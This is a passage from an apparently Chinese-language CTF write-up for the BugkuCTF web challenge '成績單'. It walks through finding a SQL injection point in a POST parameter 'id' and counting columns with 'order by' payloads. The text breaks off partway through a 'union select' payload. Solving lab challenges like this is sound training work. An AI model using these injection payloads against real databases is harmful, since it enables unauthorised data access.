BugkuCTF-Web-成績單

輸入1,2,3有回顯,但是URL不變化,發現不是GET方法 查看源碼知用POST方法傳參,name爲id 先用payload:id=1’ and ‘1’=‘1,發現正確執行,則存在注入點。 用order by語句判斷字段個數: id=-1’ order by 5# 顯示不正常 id=-1’ order by 4# 顯示正常,則有4個字段 字段精確位置: id=-1’ union select 1,
相關文章
相關標籤/搜索